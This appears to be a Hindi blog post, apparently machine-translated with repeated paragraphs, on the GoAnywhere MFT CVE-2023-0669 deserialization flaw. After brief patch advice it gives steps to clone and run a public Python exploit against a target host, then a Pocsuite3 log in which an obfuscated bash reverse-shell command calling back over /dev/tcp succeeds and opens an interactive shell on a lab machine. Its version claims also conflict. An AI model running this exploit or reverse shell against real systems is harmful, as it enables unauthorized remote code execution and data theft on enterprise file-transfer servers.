
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet डिसीरियलाइज़ेशन कमज़ोरियाँ Python RCE PoC(प्रमाण की अवधारणा)
CVE-2023-0669 GoAnywhere MFT डिसेरियलाइज़ेशन - Je Yiuwai का ब्लॉग
CVE-2023-0669 एक GoAnywhere MFT डिसेरियलाइज़ेशन भेद्यता है, जो लाइसेंस रिस्पॉन्स सर्वलेट में प्री-ऑथेंटिकेटेड कमांड इंजेक्शन भेद्यता के कारण उत्पन्न होती है, जिससे हमलावर हमलावर द्वारा नियंत्रित ऑब्जेक्ट को डिसेरियलाइज़ करके प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकता है। यह भेद्यता संस्करण 7.1.2 से पहले (7.1.2 को छोड़कर) को प्रभावित करती है।
CVE-2023-0669 एक GoAnywhere MFT डिसेरियलाइज़ेशन भेद्यता है, जो लाइसेंस रिस्पॉन्स सर्वलेट में प्री-ऑथेंटिकेटेड कमांड इंजेक्शन भेद्यता के कारण उत्पन्न होती है, जो हमलावर को इच्छानुसार कोड निष्पादित करने की अनुमति देती है।
यह भेद्यता एंटरप्राइज़-स्तरीय फ़ाइल ट्रांसफर सॉफ़्टवेयर GoAnywhere MFT की सुरक्षा के लिए गंभीर खतरा उत्पन्न करती है। हमलावर इसका फायदा उठाकर संवेदनशील डेटा चुरा सकते हैं, डेटा में छेड़छाड़ कर सकते हैं, और सिस्टम से समझौता कर सकते हैं। इसलिए, उपयोगकर्ताओं को अपने सिस्टम की सुरक्षा के लिए तुरंत उपाय करने की आवश्यकता है।
आधिकारिक सुरक्षा सलाह जारी की गई है, और प्रारंभिक जांच विधियाँ प्रदान की गई हैं। उपयोगकर्ता यह जांच सकते हैं कि क्या userdata/logs लॉग में विशिष्ट स्ट्रिंग दिखाई देती है, ताकि यह पता चल सके कि सिस्टम इस भेद्यता से प्रभावित है या नहीं। यदि पैच लागू नहीं किए जा सकते, तो सिस्टम की सुरक्षा के लिए अन्य सुरक्षा उपाय अपनाने की सिफारिश की जाती है।
संक्षेप में, CVE-2023-0669 एक डिसेरियलाइज़ेशन भेद्यता है जो उपयोगकर्ताओं का ध्यान आकर्षित करती है। उपयोगकर्ताओं को तुरंत नवीनतम संस्करण में अपडेट करना चाहिए और जांचना चाहिए कि क्या उनके सिस्टम इस भेद्यता से प्रभावित हैं। साथ ही, उपयोगकर्ताओं को GoAnywhere MFT जैसे एंटरप्राइज़-स्तरीय सॉफ़्टवेयर की सुरक्षा प्रबंधन को मजबूत करने और सिस्टम की सुरक्षा के लिए बहु-स्तरीय सुरक्षा उपाय अपनाने की सलाह दी जाती है।
यह एक्सप्लॉइट एक पायथन स्क्रिप्ट है, जिसका उपयोग GoAnywhere MFT v6.7.9594 और उससे पहले के संस्करणों में भेद्यता CVE-2023-0669 का दोहन करने के लिए किया जाता है।
यह भेद्यता GoAnywhere MFT में एन्क्रिप्टेड बंडल अनुरोधों को संसाधित करते समय सुरक्षा समस्या के कारण मौजूद है। हमलावर एक विशेष रूप से तैयार अनुरोध भेजकर लक्ष्य सर्वर पर मनमाना कोड निष्पादित कर सकता है।
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <लक्ष्य सर्वर IP>
यह एक्सप्लॉइट एक पायथन स्क्रिप्ट है, जिसका उपयोग GoAnywhere MFT v6.7.9594 और उससे पहले के संस्करणों में भेद्यता CVE-2023-0669 का दोहन करने के लिए किया जाता है।
यह भेद्यता GoAnywhere MFT में एन्क्रिप्टेड बंडल अनुरोधों को संसाधित करते समय सुरक्षा समस्या के कारण मौजूद है। हमलावर एक विशेष रूप से तैयार अनुरोध भेजकर लक्ष्य सर्वर पर मनमाना कोड निष्पादित कर सकता है।
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <लक्ष्य IP>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
लेखक: Je Yiuwai द्वारा संपादित xiaomi pad 6 pro द्वारा